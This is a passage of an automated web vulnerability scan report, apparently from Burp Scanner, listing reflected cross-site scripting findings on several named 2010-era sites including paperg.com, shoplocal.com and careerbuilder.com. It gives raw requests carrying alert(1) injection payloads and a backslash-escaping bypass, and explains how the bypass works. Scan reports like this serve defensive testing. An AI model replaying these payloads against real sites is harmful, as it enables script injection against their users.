The value of the 514e9 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d23b'-alert(1)-'2f0a88819c9 was submitted in the 514e9 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9 HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=tgkar1ao449m0cf8fnr8i5oqb2;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:44:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 38483

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.242. http://www.paperg.com/jsfb/embed.php [514e9'-alert(1)-'c9c3e793f35 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the 514e9'-alert(1)-'c9c3e793f35 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b45a5'-alert(1)-'33bc75a77ed was submitted in the 514e9'-alert(1)-'c9c3e793f35 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:50:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=dhp92f9l0lis55cnv8040gis54; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38508

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.243. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18be1%3balert(1)//7595c8d1dbb was submitted in the bid parameter. This input was echoed as 18be1;alert(1)//7595c8d1dbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=fvoptsd42e3hkt4pfm52800q90; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37192

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL226718be1;alert(1)//7595c8d1dbb = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');
...[SNIP]...

2.244. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a1d'-alert(1)-'544a3639a3c was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=6nns86ujkiu8g4lg0obo4apq44; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38534

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267b6a1d'-alert(1)-'544a3639a3c = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

2.245. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514e9'-alert(1)-'c9c3e793f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1 HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=77ha5ca3vhecpt0dpk8kk1eml1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 38481

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

2.246. http://www.paperg.com/jsfb/embed.php [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4e3'-alert(1)-'ba6e9cc672 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267 HTTP/1.1
Accept: */*
Referer: http://www.miamiherald.com/cars/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.paperg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:23:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=2dal9ah2n2uu01h72vg85q5hk3; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37701

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

2.247. http://www.rentalhomesplus.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rentalhomesplus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fff53"-alert(1)-"c1b63fc5c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fff53"-alert(1)-"c1b63fc5c18=1 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|100@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|138@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Sun, 14-Oct-2012 22:44:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rpx2o1e0bc3mnkf14ernsn55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:44:47 GMT
Connection: close
Content-Length: 62104
Set-Cookie: aptspersistence=612439212.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<!--BEGIN
...[SNIP]...
<!-- Shared -->    
var regionName = "";
var areaName = "";
var subareaName = "";
var PropType = "";
var siteName    = "RHP";
var friendlyURL = "/?fff53"-alert(1)-"c1b63fc5c18=1";
var friendlyURLSearch = friendlyURL.search("for-rent");

if(pageCheck == "avsummary")
   {
if(PropType == "3" || siteName == "RHP")
{
var avSummary
...[SNIP]...

2.248. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shoplocal.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4390'-alert(1)-'aca305d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e4390'-alert(1)-'aca305d9be=1 HTTP/1.1
Host: www.shoplocal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uioo4y55ykop5355roagiprp; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Wed, 14-Nov-2035 23:45:10 GMT; path=/
Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:45:09 GMT
Connection: close
Content-Length: 56291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<
...[SNIP]...
<script language="javascript">
var pt = new Image();
pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?e4390'-alert(1)-'aca305d9be=1&action=home&viewmode=local&referrer=&random=897241575&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script>
...[SNIP]...

2.249. http://www.sportsnetwork.com/aspdata/clients/sportsnetwork/RealScoresClientLive.aspx [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /aspdata/clients/sportsnetwork/RealScoresClientLive.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1853c"style%3d"x%3aexpression(alert(1))"40924e9e725 was submitted in the client parameter. This input was echoed as 1853c"style="x:expression(alert(1))"40924e9e725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /aspdata/clients/sportsnetwork/RealScoresClientLive.aspx?client=miami21853c"style%3d"x%3aexpression(alert(1))"40924e9e725 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.miamiherald.com/sports/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.sportsnetwork.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 14 Nov 2010 22:23:33 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=60
Expires: Sun, 14 Nov 2010 22:24:33 GMT
Last-Modified: Sun, 14 Nov 2010 22:23:33 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 7125

<head><link href="http://www.sportsnetwork.com/aspdata/clients/miami21853c"style="x:expression(alert(1))"40924e9e725/RealTab.css" rel="stylesheet" type="text/css" /><style><!--.tab{color: #000000;font
...[SNIP]...

2.250. http://yourblogs.miamiherald.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yourblogs.miamiherald.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2473"><script>alert(1)</script>d18d2a8007 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b2473"><script>alert(1)</script>d18d2a8007=1 HTTP/1.1
Host: yourblogs.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
ETag: d04fd3aaf6ab2773e6e35b65c34361f5
X-RSS-CACHE-STATUS: MISS
Last-Modified: Sun, 14 Nov 2010 21:45:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Community Blog Network</title>

<link rel="shortcut icon" href="htt
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://yourblogs.miamiherald.com/index.php?b2473"><script>alert(1)</script>d18d2a8007=1&amp;media=rss" />
...[SNIP]...

2.251. http://accounting.careerbuilder.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5fd\'%3balert(1)//663d5006bad was submitted in the Referer HTTP header. This input was echoed as 9d5fd\\';alert(1)//663d5006bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9d5fd\'%3balert(1)//663d5006bad

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199301
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:35:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9d5fd\\';alert(1)//663d5006bad';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.252. http://accounting.careerbuilder.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f6fc\'%3balert(1)//8602fe1ed7 was submitted in the Referer HTTP header. This input was echoed as 9f6fc\\';alert(1)//8602fe1ed7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9f6fc\'%3balert(1)//8602fe1ed7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199290
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9f6fc\\';alert(1)//8602fe1ed7';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.253. http://accounting.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /JobSeeker/Jobs/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 114ab\'%3balert(1)//117bf833582 was submitted in the Referer HTTP header. This input was echoed as 114ab\\';alert(1)//117bf833582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=114ab\'%3balert(1)//117bf833582

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186387
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:28:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Job Se
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 114ab\\';alert(1)//117bf833582';
